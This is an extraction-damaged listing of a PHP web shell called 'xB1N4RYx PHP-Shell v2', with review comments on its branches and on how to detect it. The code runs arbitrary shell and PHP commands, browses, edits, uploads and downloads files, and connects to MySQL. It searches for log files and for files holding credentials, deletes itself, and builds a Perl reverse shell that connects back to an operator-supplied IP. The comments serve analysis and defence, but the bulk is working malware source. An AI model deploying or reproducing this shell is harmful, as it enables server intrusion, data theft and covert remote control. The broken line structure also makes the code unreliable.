/*
 * NOTE(review): extraction-damaged listing of a PHP web shell (its own banner strings
 * read "xB1N4RYx" and, further down, "xB1N4RYx PHP-Shell v2"). The start of the file is
 * missing, markup inside the echo strings has been stripped, and the original line
 * breaks are gone, so each `//` below swallows code that used to sit on the next line.
 * Read it as an analysis sample; the code is left exactly as found.
 *
 * Contents of these two lines, in order:
 *  - tail of a directory-walking helper (cut off; presumably the recurse_zip() that
 *    compress() calls).
 *  - compress($src, $xX): adds a file or directory tree to a ZipArchive opened at $xX.
 *    Both arms of the ternary yield $xX, so the name derived from $src is discarded.
 *  - get_string_between(): text between $start and $end, "" when $start is not found.
 *  - func_enabled($func): false only when $func exactly equals one comma-separated entry
 *    of the disable_functions ini value (no trimming of the entries).
 *  - binary_shell($cmd): runs $cmd with the first of shell_exec, exec, system, passthru
 *    that func_enabled() allows and returns nothing when all four are disabled. The
 *    listing shows no use of proc_open or popen, so a disable_functions value naming
 *    these four removes the command-execution paths visible here.
 *  - fExt(): extension component from pathinfo().
 *  - Credential handling: POST 'zun' and the SHA-512 of POST 'zpw' are copied into the
 *    session whenever the session does not already match $u / $p, and compared with
 *    loose != / ==. $u and $p are not defined anywhere in the visible listing.
 *  - page=phpinfo: prints phpinfo() when the session matches.
 *  - endsWith(), $dslash / $cslash, and the page=list handler, which appends GET 'dir'
 *    to the session's current folder whenever the result is a directory. Nothing
 *    confines that path to a base directory.
 */
addFile($src . '/' . $file,substr($src . '/' . $file,$path_length)); } } } closedir($dir); } function compress($src, $xX) { if(substr($src,-1)==='/'){$src=substr($src,0,-1);} $arr_src=explode('/',$src); $filename=$src; unset($arr_src[count($arr_src)-1]); $path_length=strlen(implode('/',$arr_src).'/'); $f=explode('.',$filename); $filename=$f[0]; $filename=(($filename=='')? $xX : $xX); $zip = new ZipArchive; $res = $zip->open($filename, ZipArchive::CREATE); if($res !== TRUE){ echo 'Error: Unable to create zip file'; exit;} if(is_file($src)){$zip->addFile($src,substr($src,$path_length));} else{ if(!is_dir($src)){ $zip->close(); @unlink($filename); echo 'Error: File not found'; exit;} recurse_zip($src,$zip,$path_length);} $zip->close(); //exit; } function get_string_between($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } function func_enabled($func){ $disabled = explode(',', ini_get('disable_functions')); foreach ($disabled as $dis){ if($dis == $func) return false; } return true; } function binary_shell($cmd){ if(func_enabled("shell_exec")) return shell_exec($cmd); else if(func_enabled("exec")) return exec($cmd); else if(func_enabled("system")) return system($cmd); else if(func_enabled("passthru")) return passthru($cmd); } function fExt($filename) { $path_info = pathinfo($filename); return $path_info['extension']; } $images = array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff"); $movies = array("avi","mpg","mpeg"); $user = $_POST['zun']; $pass = hash("sha512", $_POST['zpw']); $pazz = $p; if($_SESSION['zusrn'] != $u || $_SESSION['zpass'] != $pazz) { $_SESSION['zusrn'] = $user; $_SESSION['zpass'] = $pass; } if($_GET['page'] == "phpinfo"){ if($_SESSION['zusrn'] == $u && $_SESSION['zpass'] == $pazz){ echo 'xB1N4RYx'; phpinfo(); return;} } echo ' xB1N4RYx '; function endsWith($haystack, $needle) { 
$length = strlen($needle); $start = $length * -1; //negative return (substr($haystack, $start) === $needle); } if(endsWith($_GET['dir'], "\\")){ $dslash = ""; } else{ $dslash = "/"; } if(endsWith(realpath($_SESSION['current_folder']), "/") || endsWith(realpath($_SESSION['current_folder']), "\\")){ $cslash = ""; } else{ $cslash = "/"; } if($_GET['page'] == "list"){ if(!isset($_SESSION['current_folder'])){ $_SESSION['current_folder'] = "./"; } else{ if(is_dir(realpath($_SESSION['current_folder']).$cslash.$_GET['dir'])) $_SESSION['current_folder'] = realpath($_SESSION['current_folder']).$cslash.$_GET['dir']; } } echo '
Software: 
OS: 
User: 
PHP Version: 
MySQL Version: 
Server IP: 
Safemode: 
Disabled Funcs: 
Disk Info: 
Current Folder: 
Shell Folder: 
';
/*
 * NOTE(review): host-information banner. It prints the server software string,
 * php_uname(), the output of `id` (a child process started through binary_shell()),
 * the PHP and MySQL client versions, the server name with its resolved address,
 * the safe_mode and disable_functions settings, and disk usage of "/".
 * In this listing it appears before the credential check, but statement order here
 * is unreliable, so whether an unauthenticated request reaches it cannot be confirmed.
 * Detection: a web-server PHP worker executing `id` when a page is rendered.
 */
$ts = disk_total_space("/")/1024/1024/1024;// IN GB $fs = disk_free_space("/")/1024/1024/1024;// IN GB $soft = str_replace("PHP/".phpversion()."", "", getenv("server_software")); echo $soft.'
'; echo wordwrap(php_uname(),90," ",1).'
'; echo binary_shell("id").'
'; echo phpversion().'
'; echo mysql_get_client_info().'
'; echo getenv("server_name").' / '.gethostbyname(getenv("server_name")).'
'; if (strtolower(@ini_get("safe_mode")) == "on" || @ini_get("safe_mode") == true) { echo 'On
'; } else{ echo 'Off
'; } if(@ini_get("disable_functions") == "") echo "None
"; else echo ''.@ini_get("disable_functions").'
'; echo round($fs, 2).' GB Free'.' of Total '.round($ts, 2).' GB'.' ('.round(100/($ts/$fs), 2).'%)
'; if(preg_match("/\//i", realpath($_SESSION['current_folder']))){ $cpaths = explode('/', realpath($_SESSION['current_folder'])); $pathslash = '/'; } else{ $cpaths = explode('\\', realpath($_SESSION['current_folder'])); $pathslash = '\\'; } echo '
'; $asdAsD = 0; foreach($cpaths as $paths){ $buffer .= $paths.$pathslash; if($asdAsD <= count($cpaths)-2){ echo ''.$paths.''.$pathslash.''; } else{ echo ''.$paths.''; } $asdAsD++; } echo '
'; //'.realpath($_SESSION['current_folder']).' //echo '
'; //echo ''.realpath($_SESSION['current_folder']).'
'; //echo ''; echo ''.realpath("./").'
'; echo '
'; echo 'Your IP: '.getenv("remote_addr").''; if($_SESSION['zusrn'] == $u && $_SESSION['zpass'] == $pazz) echo '
Logout'; if(isset($_SESSION['muser'])) echo '
MySQL Logout'; echo '

'; echo '
'; echo '
'; break; case "logout": session_destroy(); echo ''; break; case "mylogout": unset($_SESSION['mhost']); unset($_SESSION['mport']); unset($_SESSION['muser']); unset($_SESSION['mpass']); unset($_SESSION['mlog']); echo ''; break; case "go": $goto = $_GET['goto']; if(!isset($goto)){ echo ''; echo '
'; echo ''; } else{ $_SESSION["current_folder"] = $goto; echo ''; } break; case "cf": $ff = $_POST['fc']; $f = realpath($_SESSION['current_folder'])."/".$ff; echo '
';
/*
 * NOTE(review): body of the "cf" (create file) branch. $f was built on the previous
 * line from the session folder plus the POSTed 'fc' name, with no normalisation of
 * that name. A file created here contains the fixed marker string written below,
 * which is a usable content indicator when hunting for artefacts this tool left on
 * a host.
 */
if(isset($ff)){ if(file_exists($f)){ echo 'File Already Exists!'; } else{ echo 'Done!'; $fo = @fopen($f, "w"); fwrite($fo, "File Created By xB1N4RYx PHP-Shell v2"); fclose($fo); } } echo '
Create File'; echo '
'; echo '
'; echo ''; echo '
'; break; case "df": $ff = $_GET['f']; $f = realpath($_SESSION['current_folder'])."/".$ff; echo '
'; if(isset($ff)){ if(file_exists($f)){ unlink($f); echo 'Done!'; } else{ echo 'File Doesnt Exist!'; } } echo '
Delete File'; echo '
'; echo '
'; echo ''; echo '
'; if(!isset($_GET['noredirect'])) echo ''; break; case "cfo": $ff = $_POST['fco']; $f = realpath($_SESSION['current_folder'])."/".$ff; echo '
'; if(isset($ff)){ if(file_exists($f)){ echo 'Folder Already Exists!'; } else{ echo 'Done!'; mkdir($f, 0777); } } echo '
Create Folder'; echo '
'; echo '
'; echo ''; echo '
'; break; case "dfo": $ff = $_GET['f']; $f = realpath($_SESSION['current_folder'])."/".$ff; echo '
'; if(isset($ff)){ if(!file_exists($f)){ echo 'Folder Doesnt Exist!'; } else{ echo 'Done!'; rmdir($f); } } echo ''; break;
/*
 * NOTE(review): page=php, headed "PHP Code Execution" in the output that follows.
 * Only the read of POST 'phpc' is visible; the statement that evaluates it is not
 * present in this listing (presumably lost with the stripped markup), so its exact
 * form cannot be confirmed from here.
 */
case "php": $phpc = $_POST['phpc']; echo '
PHP Code Execution

Result


'; echo '
'; echo 'Code
'; echo '
'; break; case "mysql": $host = $_POST['host']; $port = $_POST['port']; $user = $_POST['user']; $pass = $_POST['pass']; if(!isset($_SESSION['muser'])){ echo '
'; echo '
'; echo 'Host:


'; echo 'Port:


'; echo 'User:


'; echo 'Password:


'; echo '
'; echo '
'; echo '
';}
/*
 * NOTE(review): MySQL client branch. Host, port, user and password arrive by POST
 * (read on an earlier line) and are kept in $_SESSION in clear text, so they are
 * also written to whatever session storage the host uses. A failed connection clears
 * them and ends the script with die(). The mysql_* API used here was removed in
 * PHP 7.0, which suggests the sample was written for PHP 5.x hosts.
 * The original line breaks are lost: everything after the first `//` on the line
 * below reads as a comment to a parser, although most of it was live code.
 */
// else{ if(isset($user)){ $_SESSION['mhost'] = $host; $_SESSION['mport'] = $port; $_SESSION['muser'] = $user; $_SESSION['mpass'] = $pass;} if(isset($_SESSION['muser'])){ $l = mysql_connect($_SESSION['mhost'].":".$_SESSION['mport'], $_SESSION['muser'], $_SESSION['mpass']); if(!$l){ unset($_SESSION['mhost']); unset($_SESSION['mport']); unset($_SESSION['muser']); unset($_SESSION['mpass']); unset($_SESSION['mlog']); die("Can't Connect To MySQL"); } if($_SESSION['mlog'] < 1) echo ''; $_SESSION['mlog'] = 1; } // } if(isset($_SESSION['muser'])){ //if(!isset($_GET['db']) && isset($_POST['user'])){ $dbs = mysql_query("SHOW DATABASES"); echo '
'; if($_SESSION['zusrn'] != $u || $_SESSION['zpass'] != $pazz) { echo '
'; echo '
'; echo 'xB1N4RYx PHP-Shell v2

'; echo 'Username:


'; echo 'Password:

'; echo '
'; echo '
'; echo '
'; echo '
';
/*
 * NOTE(review): end of the login-form branch. When the session values do not match
 * the stored credentials the form is printed and the script returns here, so the
 * page dispatcher below is reached only after that comparison has passed.
 */
return; }
/*
 * fsize($file): human-readable size of $file.
 * Returns "~" for an empty file, "2 GB+" when filesize() reports a negative value
 * (presumably integer overflow on 32-bit builds; confirm), otherwise the size in
 * GB, MB or KB rounded to one decimal. filesize() is re-evaluated in each test.
 */
function fsize($file){
if(filesize($file) == 0) return "~";
if(filesize($file) < 0) return "2 GB+";
if(round(filesize($file)/1024/1024, 1) >= 1024) return round(filesize($file)/1024/1024/1024, 1)." GB";
if(round(filesize($file)/1024, 1) >= 1024) return round(filesize($file)/1024/1024, 1)." MB";
return round(filesize($file)/1024, 1)." KB"; }
/*
 * Page dispatcher: the GET 'page' value selects the branch. Several `case` labels
 * of this switch appear earlier in the listing than the switch itself, an artefact
 * of the damaged extraction.
 */
switch($_GET['page']){ default: echo '
xB1N4RYx PHP-Shell v2
'; break;
/*
 * NOTE(review): page=findlogs. Writes a one-line Perl script named log.pl into the
 * process working directory and runs it through binary_shell() with the requester's
 * address (REMOTE_ADDR) as the search term; the loop below prints the matching paths
 * under the session folder. In effect it lists files that recorded the operator's IP.
 * log.pl is unlinked afterwards.
 * Detection: short-lived .pl files created beside a PHP script, and perl running as
 * a child of the web-server worker. Both are visible to file-integrity monitoring
 * and process telemetry on web roots.
 */
case "findlogs": $fi = fopen("log.pl","w"); fwrite($fi,'system("cd '.realpath($_SESSION['current_folder']).' && find | xargs grep \'".$ARGV[0]."\'");'); fclose($fi); $sh = binary_shell("perl log.pl ".getenv("remote_addr")); $files = explode("\r\n",$sh); echo "
Possible log files:

"; foreach($files as $file){ $f = get_string_between($file,"/",":"); $fa = '/'.get_string_between($file,"/","No such file"); if($f != "") echo str_replace("//","/",realpath($_SESSION['current_folder']).'/'.$f)."
"; } echo "
"; unlink("log.pl"); break;
/*
 * NOTE(review): page=findmysql. Same pattern with sql.pl and the fixed search term
 * mysql_connect, i.e. it looks for source files likely to hold database credentials.
 * Mitigation: keep database credentials out of files the web-server account can read
 * beyond what the application needs, and rotate them after a compromise like this.
 */
case "findmysql": $fi = fopen("sql.pl","w"); fwrite($fi,'system("cd '.realpath($_SESSION['current_folder']).' && find | xargs grep \'".$ARGV[0]."\'");'); fclose($fi); $sh = binary_shell("perl sql.pl mysql_connect"); $files = explode("\r\n",$sh); echo "
Possible mysql password files:

"; foreach($files as $file){ $f = get_string_between($file,"/",":"); $fa = '/'.get_string_between($file,"/","No such file"); if($f != "") echo str_replace("//","/",realpath($_SESSION['current_folder']).'/'.$f)."
"; } echo "
"; unlink("sql.pl"); break; case "removelogs": break; case "list": $dir = @opendir($_SESSION['current_folder']); $xazz = 0; if(!$dir){ $_SESSION['current_folder'] = "./"; } echo ''; echo ''; while (($dirs = @readdir($dir)) != false){ $color = array("#000000","#111111","#444444"); if(is_dir(realpath($_SESSION['current_folder'])."/".$dirs) && $dirs != "." && $dirs != ".."){ if($xazz == 1) $xazz--; else $xazz++; echo ''; }} echo ''; $nondir = @opendir(realpath($_SESSION['current_folder'])); while (($files = @readdir($nondir)) != false){ if(!is_dir(realpath($_SESSION['current_folder'])."/".$files)){ if($xazz == 1) $xazz--; else $xazz++; echo ''; echo ''; echo ''; echo ''; }} closedir($dir); closedir($nondir); echo '
File Size
Extra Options
Permissions
Options
 
  
Download ~ Delete





'.fsize(realpath($_SESSION['current_folder']).$cslash.$files).'
'; if(is_executable(realpath($_SESSION['current_folder']).$cslash.$files)) echo '
Start ~ Kill
'; else echo ' '; $permissions = is_writeable($files); if($permissions == true) $perms = 'Editable'; else $perms = 'Locked'; echo '
'; echo '
'.$perms.'
'; echo '
Edit ~ Download ~ Delete
'; break; case "crypt": echo '
'; echo '
'; echo 'Input:


'; echo '
'; echo ''; echo '
'; echo '
'; echo '
'; echo '

md5

'; echo '

sha1

'; echo '

sha256

'; echo '

sha384

'; echo '

sha512

'; echo '
'; echo '
Decrypt SHA1/MD5 Hashes'; echo '
'; break;
/*
 * NOTE(review): page=shell. The POSTed 'cmd' value is concatenated after
 * "cd <session folder> &&" and executed through binary_shell() with the privileges
 * of the PHP process.
 * Detection: POST requests to a single script with page=shell in the query string
 * and a 'cmd' form field, and shell children of the web-server worker.
 */
case "shell": $sh = binary_shell("cd ".realpath($_SESSION["current_folder"])." && ".$_POST['cmd']); echo '
'; echo ''; echo '
'; echo ''; echo ''; echo ''; break; case "view": $file = $_GET['file']; $fc = $_GET['fc']; if(!isset($fc)){ $fc = 0; } if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $images, true) && $fc != 1){ echo '
Viewing Image
[ '.$file.' ]
Download Image
'; break; } if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $movies, true) && $fc != 1){ echo '
'; break; } $fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$file), "r"); $fr = @fread($fo, filesize(realpath($_SESSION["current_folder"].$cslash.$file))); echo '
'; echo '
Editing '.realpath($_SESSION["current_folder"].$cslash.$file).'
Highlight PHP

'; echo ''; echo ''; echo '
'; echo '
'; fclose($fo); break; case "saveedit": $fs = $_POST['file']; $fd = $_POST['ctext']; if (get_magic_quotes_gpc()){ if (!function_exists("strips")){ function strips(&$arr,$k=""){ if (is_array($arr)){ foreach($arr as $k=>$v){ if (strtoupper($k) != "GLOBALS"){ strips($arr["$k"]); } } } else{ $arr = stripslashes($arr); } } } strips($GLOBALS); } $fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "w"); $fo2 = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "r"); $fw = @fwrite($fo, $fd); $fr = @fread($fo2, filesize(realpath($_SESSION["current_folder"].$cslash.$fs))); echo '
'; echo '

Saved!

Editing '.realpath($_SESSION["current_folder"].$cslash.$fs).'
Highlight PHP

'; echo ''; echo ''; echo '
'; echo '
'; fclose($fo); fclose($fo2); break; case "highlight": $fil = $_GET['file']; $filz = realpath($_SESSION["current_folder"].$cslash.$fil); echo '
'; echo '
Highlighting '.realpath($_SESSION["current_folder"].$cslash.$fil).'
Edit'; echo '
'; $hl = highlight_file($filz, true); echo $hl; echo '
Databases:
'; echo ''; while ($row = mysql_fetch_assoc($dbs)) { echo ''; } echo '
'.$row['Database'] . 'Query
'; echo '
'; switch($_GET['a']) { default: echo ' 
'; break; case "tables": $db = $_GET['db']; echo 'Tables of '.$_GET['db'].'
'; $t = mysql_query("SHOW TABLES FROM ".$_GET['db']); while($tb = mysql_fetch_row($t)){ echo ''.$tb[0].'
'; } break; case "columns": echo 'Data of '.$_GET['table']." @ ".$_GET['db'].'
'; echo ''; $db = $_GET['db']; $t = $_GET['table']; mysql_select_db($db, $l); $c = mysql_query("SHOW COLUMNS FROM ".$t); while($cc = mysql_fetch_array($c)){ echo ''; } echo ''; $d = mysql_query("SELECT * FROM ".$t); while($dd = mysql_fetch_array($d)){ echo ''; for($i = 0; $i <= count($dd)/2-1; $i++){ echo ''; //echo ''; } echo ''; } echo ''; echo '
   '.$cc[0].'   
   '.$dd[$i].'   
'; break; case "query": $db = $_POST['pdb']; if(!isset($db)) $db = $_GET['db']; $q = $_POST['query']; if(isset($db)) echo 'Execute Query In '.$db.'
'; if(isset($q)){ mysql_select_db($db, $l); mysql_query(stripslashes($q)); echo 'Done!'; } echo '
'; echo ''; echo ''; echo '
'; echo '
'; break; } echo '
'; } break;
/*
 * NOTE(review): page=ktask. GET 'f' is placed unescaped into three commands, and both
 * the Windows form (taskkill) and the Unix form (pidof, then kill -9) are run on
 * every request regardless of platform.
 */
case "ktask": $f = $_GET['f']; $win = binary_shell("taskkill /F /IM ".$f); $gpid = binary_shell("pidof ".$f); $linux = binary_shell("kill -9 ".$gpid); if(isset($win)) echo "
".$win."
"; else echo "
".$linux."
"; break;
/*
 * NOTE(review): page=stask. Runs the file named by GET 'f' from the session folder,
 * once as given and once with a "./" prefix, again through binary_shell().
 */
case "stask": $f = $_GET['f']; $folder = realpath($_SESSION['current_folder'])."/"; $win = binary_shell("cd ".$folder." && ".$f); $linux = binary_shell("cd ".$folder." && "."./".$f); if(isset($win)) echo "
".$win."
"; else echo "
".$linux."
"; break;
/*
 * NOTE(review): page=downloadfile and page=downloadzip are the data-exfiltration
 * branches. downloadfile streams any existing path built from the session folder
 * plus GET 'f' as an attachment. downloadzip calls compress() to build "<f>.zip"
 * relative to the working directory and streams it; no unlink follows in the visible
 * code, so archives may remain on disk as artefacts.
 * Detection: application/octet-stream or application/zip responses from a .php
 * endpoint that is not one of the application's known download routes, and
 * unexpected .zip files in web directories.
 */
case "downloadfile": $f = $_GET['f']; $file = realpath($_SESSION['current_folder'])."/".$f; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.$f); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; /*header('Content-disposition: attachment; filename='.$f.''); header('Content-type: application/octet-stream'); ob_clean(); flush(); readfile($file);*/ } break; case "downloadzip": //echo ''; $f = $_GET['f']; $file = realpath($_SESSION['current_folder'])."/".$f; $fi = realpath("./".$f.'.zip'); compress($file, $f.'.zip'); header('Content-Description: File Transfer'); header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename='.$f.'.zip'); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($fi)); ob_clean(); flush(); readfile($fi); exit; break; case "upload": echo '

'; echo 'Select File:

'; echo ''; echo '

Upload to:

'; echo '
'; break;
/*
 * NOTE(review): page=dupload. The destination directory comes from POST 'to' and is
 * used after realpath() only; basename() is applied to the client file name. Nothing
 * restricts the directory or the file type.
 */
case "dupload": $up = realpath($_POST['to'])."/".basename($_FILES['f']['name']); if(move_uploaded_file($_FILES['f']['tmp_name'], $up)) echo "Upload Successful!"; else echo "Upload Unsuccessful! :("; break; case "sr": echo '
Do you really want to remove this shell?
'; break;
/*
 * NOTE(review): page=selfremove deletes the script's own file (SCRIPT_FILENAME).
 * The file may therefore be gone by the time a host is examined; web access logs,
 * backups and file-integrity records are then the remaining evidence of it.
 */
case "selfremove": unlink($_SERVER['SCRIPT_FILENAME']); echo ''; break; case "viewimage": $i = $_GET['i']; $v = realpath($_SESSION['current_folder']).$cslash.$i; /*echo $v; echo '
'; echo ''; echo '
';*/ header("Content-type: image/png"); ob_clean(); flush(); readfile($v); break; case "viewmovie": $i = $_GET['i']; $v = realpath($_SESSION['current_folder']).$cslash.$i; header("Content-type: video/quicktime"); ob_clean(); flush(); readfile($v); break; case "bcon": echo '
'; echo '
'; echo 'IP:


'; echo 'Port:
'; echo '
'; echo '
';
/*
 * NOTE(review): body of the "bcon" (connect-back) branch. When GET 'ip' and 'port'
 * are set it writes a Perl script to /tmp/bxcon.pl, runs it with shell_exec()
 * directly rather than through binary_shell(), then unlinks it. The script text
 * opens a TCP connection to the supplied address and attaches /bin/sh to it.
 * Detection and mitigation: restrict outbound connections from web servers, alert
 * on perl or "/bin/sh -i" with a web-server parent process, and watch for
 * create/delete events on /tmp/bxcon.pl.
 */
if(isset($_GET['ip']) && isset($_GET['port'])){ $ip = $_GET['ip']; $port = $_GET['port']; $bc = fopen("/tmp/bxcon.pl","w"); fwrite($bc,'#!/usr/bin/perl use Socket; $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n"); $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n"); $proto=getprotobyname("tcp"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system("/bin/sh -i"); close(STDIN); close(STDOUT); close(STDERR);'); fclose($bc); shell_exec("perl /tmp/bxcon.pl"); unlink("/tmp/bxcon.pl"); } break; } echo '
xB1N4RYx ~ 2012

'; ?> Sw Bilgi

'.php_uname().'
'; echo '
'; echo '
';
/*
 * NOTE(review): from the closing tag a few lines above, the listing is a fragment of
 * a second, separate uploader script. This statement copies the uploaded temp file
 * to the client-supplied file name in the working directory, with errors suppressed
 * by @. The name is used unchanged, so the stored file keeps whatever extension the
 * client chose. The status strings are Turkish ("Yuklendi" = uploaded,
 * "Basarisiz" = failed).
 * Mitigation: store uploads outside the web root and do not let the upload directory
 * execute scripts.
 */
if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Yuklendi

'; } else { echo 'Basarisiz

'; } } } $x = $_GET["x"]; Switch($x){ case "rooting"; rooting(); break; } ?>